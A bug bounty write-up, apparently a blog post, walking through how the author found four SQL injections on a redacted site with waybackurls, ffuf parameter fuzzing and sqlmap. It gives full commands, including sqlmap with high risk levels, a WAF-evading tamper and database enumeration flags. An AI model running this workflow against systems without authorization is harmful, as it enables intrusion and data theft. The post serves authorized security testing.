How I Found multiple SQL Injection with FFUF and Sqlmap in a few minutes
Hello all, hope you’re OK. Our journey today is about how I found multiple SQL Injection in a BugBounty program in just few minutes with a cool technique . Let’s begin and call our target redacted.org.
I started to look at the web archive of the target with the waybackurls tool, I found a bunch of endpoints, but I observed a lot of PHP files!! Mmmmm, maybe I find SQL Injection in one of those, Ok Let’s filter the output. so my command will be:
waybackurls https://redacted.org/ | uro | grep “.php” > php-files.txt
Ok we have a lot of PHP files, Let’s look at some of them
Mmmmmm, the PHP files name seems interesting, I think it can help me to find the parameters. OK let's do some bash to grep the names after get to make a list of parameters to brute force in the endpoints. Let’s goooo
Firstly, we need to grep only lines which contain get string and delete all before it and make it unique to avoid the duplicate, so our command will be: $ cat php-files.txt| grep -i get | sed ‘s/.*.get//’ | sort -u
Niceeeeee!! I did it, but we should remove .php string to make a list, so I just added the line to the last command cut -f1 -d”.”
Ok, we are almost finished, I noticed that all the strings I had contained two words and I don’t know which of them is a parameter, so let’s split it!!! honestly, I didn’t know how to do it , so I did some search about this operation till I came across this , and I found what I want !! and the additional command will be sed ‘s/[A-Z]\+/\n&/g’
Niiiiice!! Ok, but I think that most parameters are lowercase, not uppercase so I’ll keep this as uppercase parameters and convert it to lowercase and I’ll test both of them ;)
so now we have two lists of parameters let’s test it with FFUF, firstly I’ll grep endpoint and test all params with it, I’ll try the lowercase-parameters first with this command:
ffuf -w lowercase-parameters.txt -u "https://redacted.org/searchProgressCommitment.php?FUZZ=5"
But sadly I got nothing
Honestly, I got depressed after that, but an idea came to my mind, what about changing the request method to POST! rapidly I go to my VPS and changed that method ,
ffuf -w lowercase-parameters.txt -X POST -d "FUZZ=5" -u "https://redacted.org/searchProgressCommitment.php"
And BINGOOOOOOO I got commitment & id parameters as a result
Ok now go to the endpoint and intercept the request with burp and change the request method, add the parameter, and copy it to a txt file to run sqlmap on it.
The command will be:
sqlmap -r req3.txt -p commitment --force-ssl --level 5 --risk 3 --dbms=”MYSQL” --hostname --current-user --current-db --dbs --tamper=between --no-cast
— — — — — — — — — — — — — — — — — — — — — — — — — —
--level 5 --> Level of tests to perform.
--risk 3 --> Risk of tests to perform
--dbms --> back-end DBMS value
--no-cast --> to avoid use cast-alike statements during data fetching
--tamper --> to evade filters and WAF’s
"--hostname --current-user --current-db --dbs" --> to retrieve info about the database
AND I DID IT !!!!!!!
Now let’s try this way with other endpoints ;)
I picked up some endpoints and used the same FFUF command, surly with POST method.
AND BINGO!! I Found three endpoints with valid parameters from my list.
Second SQLI : ws_delComment.php with id parameter
Third SQLI: getTargets.php with goal parameter
Fourth One: mailing_lists.php with list parameter
Very Nice we got four SQL Injections:)
I reported all SQLI to the security team and they approved it and they’re working to solve the issues!!
Thanks For Reading, Cheers!
For any questions or feedback, dm me on Twitter.